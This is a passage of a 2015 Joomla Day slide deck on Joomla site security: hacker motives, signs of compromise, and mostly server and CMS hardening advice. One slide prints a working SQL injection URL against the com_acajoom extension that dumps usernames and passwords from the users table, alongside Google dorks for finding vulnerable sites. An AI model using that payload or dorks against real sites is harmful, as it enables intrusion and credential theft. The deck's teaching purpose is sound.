joomla! security jday2015

By Shaiffulnizam MohamadJOOMLA! SECURITY...Security is a moving target, so today's expert might be tomorrow's victim...

Joomla! Website’s hacked?

Definition of “Hacker”

• Someone who deliberately seeks to bypass a server’s security• Black, grey, white hats

• A hacked site is a broken/compromised site

• A skilled computer programmer

• A hacked site is a tweaked and improved site

• A script kiddie• Junior hacker using other hacker’s tools and techniques

Hacking Motives?• To see if they can

• To create mayhem

• For social standing in the sub-culture

• For political reasons – hacktivism

• For financial reasons• Theft – steal ebooks, videos, games, online services etc

• Sell data – user profiles, credit card details etc

• Industrial sabotage - paid to break competitor sites

• Set up zombie farms

• Steal bandwidth

• Host phishing pages

• Collect passwords

How do we know that we’ve been hacked?

• Site trashed

• Hacking message

• High bandwidth use

• Changed admin password

• New user with admin rights

• Server logs

Why do we care about computer security?

No ONE is SAFE!Type of site Motivation

Any site To see if they canTo create mayhemSocial standingPost political messagesZombie farmsSteal bandwidthHost phishing pages

Any membership site Sell user profiles to marketersObtain usernames and passwords

Some ecommerce sites Sell credit card details to thievesSell order history and contact details to marketers

Why worry about being hacked?

• Sites are targeted at random

• Hacking is actually quite easy

• Vulnerable sites are easy to find

• Vulnerable sites are easy to hack

• Fixing hacked sites is quite tricky• Hacks can be invisible

• Clients may not notice a hacked site for some time

• Finding a clean backup may be impossible

• Determining what has been done can be really hard

• May be difficult to restore

• Hardening site to avoid future hacks requires skill and focus

Why worry about being hacked?

Hacked sites are a big problem• Business reputation• Angry clients• Site shutdown by host• Loss of business• Data theft

Hacking Joomla! sites

Is Joomla! Sites easy to hack?• Yes and No

• Joomla has to strike a balance between security and ease of use

• Joomla an attractive target for hackers

• The critical mass of sites

• Large amateur web developer user base

• Extensions have variable security

• The site must be vulnerable

How do they hack?1. Find a vulnerability (and instructions

on how to exploit it)

2. Find a vulnerable site

3. Hack the site

1st Finding vulnerability• Security sites

• www.exploit-db.com, www.secunia.com

• Various hacking sites/forums• Joomla vulnerable extensions list

• docs.joomla.org/Vulnerable_Extensions_List

http://www.exploit-db.com/

http://www.secunia.com/

2nd find a vulnerable sites• Google Dork - a search phrase to find

vulnerable sites

• PHPInfo• intitle:phpinfo()

• Vulnerable extensions• allinurl:com_acajoom

3rd cut n paste code!http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*

Sometimes…RFI = Remote file inclusionsExecuting SHELL Files and taking control of the Server

What should we do toprevent?

• Server operating system• Server Software• PHP + MySQL

Joomla Extensions Users and their behaviour

Joomla! Security Involves


1. Updating Your Server Operating System2. Update your Server Software e.g. Apache, Nginx,

IIS, Litespeed etc3. Update Your PHP & MySQL Server4. Secure Your Server

Security Action plan

LEVELS OF SECURITY

[1] Basic actions

[2] More complex actions

[3] Actions that require significant modification rights on the server (unless already implemented by default)

Image by echiner1


http://www.flickr.com/photos/decadence/

Joomla! SecurityServer ~ shared, VPS and Dedicated

• A shared server• Your site(s) live in the same hosting space as other sites that you

do not administer

• This is the cheapest hosting option.

• No say over the security of the other sites on the server

• Old shared server is the worst location for your hosting

• A Virtual Private Server• Better than shared

• Still can’t change many settings

Joomla! SecurityServer ~ shared, VPS and Dedicated

• A dedicated server• Allow you to upgrade and tweak all the settings on a dedicated server

• Host retains responsibility for maintenance

Joomla! SecurityServer ~ Security

1. The underlying Operating System must be updated

2. Updating the Webserver e.g. Apache, Nginx etc

3. Updating the PHP and MySQL

4. Securing the Above

5. Installing additional Security layers

Joomla! SecurityServer ~ Security Hardening

1. Securing Apache WebserverAdding web headers to block XSS etc.<IfModule mod_headers.c>Header set X-XSS-Protection: "1; mode=block"Header set X-Content-Security-Policy: "allow 'self'; options inline-script; img$Header set Strict-Transport-Security: "max-age=43200; includeSubDomains"Header set Cache-Control: "max-age=3600, public, must-revalidate"Header set X-frame-options: "deny"Header set X-Content-Type-Options: "nosniff"#Header set X-Content-Security-Policy: "default-src 'self'"Header unset X-Powered-ByHeader unset X-Pingback</IfModule>

2. Hide Server Signature


3. Activating .htaccess override in Apache conf• .htaccess files

• [1] Activate the htaccess file in the Joomla root

• [1] Use an .htpasswd for the /administrator/ folder

• [3] Advanced .htaccess files


1. Hardening PHP with SUHOSIN

2. Use PHP Disable function show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

3. Do not expose PHP Version expose_php = off

4. Use open_basedir (restriction file handling functions)


• Globally reset all files• Owner – AccountUsername:AccountUsername

chown -R user:group *

• Files – 644find . -type f -exec chmod 644 {} \;

• Folders – 755find . -type d -exec chmod 755 {} \;

Use suPHPPHP files are run under the user of the website instead of the Apache user


1. Hardening MySQL server

2. Disable access from outside (allow local connections)

3. Make sure using Password or after setup, run mysql_secure_installation command

Joomla! SecurityServer ~ Additional Security Hardening

1. Add additional firewall e.g. CSF firewall

2. Add modsecurity firewall ~apache module that helps to protect your website from various attacks. It is used to block commonly known exploits by use of regular expressions and rule sets

3. Install Malware detector such as maldet

4. Install rootkit detector

5. Install fail2ban / IDS (intrusion detector)

Joomla! SecurityUse CDN for security

1. Prevent DDOS2. Stop Hackers3. Secure website from attack

Joomla! SecurityUse CDN for security

Joomla! Security Checklisthttps://docs.joomla.org/Security

Upgrade to the latest stable version of Joomla! as soon as possible.Download Joomla! from official sites only, such as JoomlaCode.org, and check the MD5 hash.Use Web Page Diagnostic Tools, i.e. Firefox Firebug, IE Web Developer Toolbar, Opera Dragonfly, etc. to ensure that all files were installed correctly.


Install official versions of Joomla!http://www.joomla.org/download.html

Install official Updates from Joomla!To avoid breaking your site, search the forums for reports of incompatible extensions before upgrading to a new version of Joomla.

http://www.joomla.org/download.html

http://joomlacode.org/

https://docs.joomla.org/How_to_determine_a_package_checksum

https://docs.joomla.org/Web_page_diagnostic_tools


Default administrator usernameChange the user name of the default admin user. This simple step effectively increases the security of this critical account 50% by modifying one of the two variables attackers must know to gain access.

Never use easy to guess passwords, avoid at no cost. e.g. admin123, passwords, 123456Use mix characters (upper and lower case) with special characters. e.g F1$hn3Tw0Rk, use more than 8 digits

Administrator passwords


Limit superadminLess superadmin, mean less problem

Disable registration, if you are not running social sites, or if your website is limited to your employee

If you are not running Social site, disable registration


Protecting directories and filesAll configurable path must be rewritableMust never use chmod 777, chmod 755 is sufficient for directories and 644 for files. Use .htaccess to disable directories such as images and download from running php files.

# secure directory by disabling script executionAddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgiOptions -ExecCGI


Remove all unneeded files and extensionsAll unneeded and unused files and extensions must be remove

In general, do not leave any unneeded files (compressed or otherwise) on a public server. Each unused (and perhaps long forgotten) file is a potential security hole.


Installing Joomla! Extensions1. Always backup2. Check for extension vulnerabilities3. Download from trusted site4. Check code quality of the extensions5. Test on development site6. Remove junk7. Avoid encrypted code

Joomla! SecurityHow to secure Joomla!

[1] SEF all URLs[2] Clear the default Joomla metatags[3] Clear the default Home page title[4] Remove generator tag[5] Change favicon[6] Hide component credits

Less information provided about Joomla!, means much difficult to attack


Two-Factor Authentication is a login method whereby a person has to provide his/her user name, password and a random generated OTP (One Time Password).

OTP is six numeric digit code, generated by cryptographic functions in a short interval. Even if a hacker was to guess your Joomla Administrator username and password correctly, they would still require the OTP to login.

To enabled Two-Factor Authentication requires Joomla 3.2.0 or higher.1.Login into the Administration area. 2.Click on Components >> Post-installation Messages. 3.Click on Enable two-factor authentication. 4.Install a Google Authenticator compatible client for your device.

Implement 2 factor Authentication

http://en.wikipedia.org/wiki/Google_Authenticator#Implementation


Trying to inject spam content onto your siteTargets Joomla core forms and extension forms

Use captcha to fight against automated spammers


Use security extensions


Disable FTP access from Joomla!

• If a hacker can obtain your FTP password, they can login as you, bypassing almost every security barrier.

• FTP passwords are stored unencrypted in your FTP program!

• FTP authentication details pass unencrypted to the server!

• There are several common FTP apps that store their passwords in a standard location with a standard name!


Change temporary folder and logs path


Make sure to check for Joomla!/extensions Update


Preparing for the WorstAre you ready?


Preparing for the Worst1. Site monitoring 2. Joomla site backups3. Restoring a hacked site

Joomla! SecuritySite monitoring

• Diagnostics• Site down• Home page content changes• Mod_security logs (shows attempts)• Bandwidth use• Spam blacklisting

• [3] Searching and browsing server logs

Joomla! SecurityJoomla! Backup

• Why backup?• When should I backup my Joomla! site?• How often should I backup my Joomla! site?• How to backup?

Joomla! SecurityJoomla! Backup

How to backup? 1. Manual backup through command line. (database)2. Using extensions such as Akeeba Backup, EJB and XCloner

What to backup?1. All files2. Images or docs

REMEMBER TO TEST YOUR BACKUP

• Fixes the obvious problems

• Does not address:• Hidden hacks

• Shell scripts

• Backdoors

• Zombies

• Continuing vulnerabilities

• Impacts of data exposure

Photo: flickr.com/photos/andreweason

Joomla! Security

The EndShaiffulnizam MohamadOWASP Members since 2010Involved in all Joomla Day Malaysia since 2007Specializing in Joomla! And Security.

[email protected] / 0129531452

Joomla! Security

joomla! security jday2015

Technology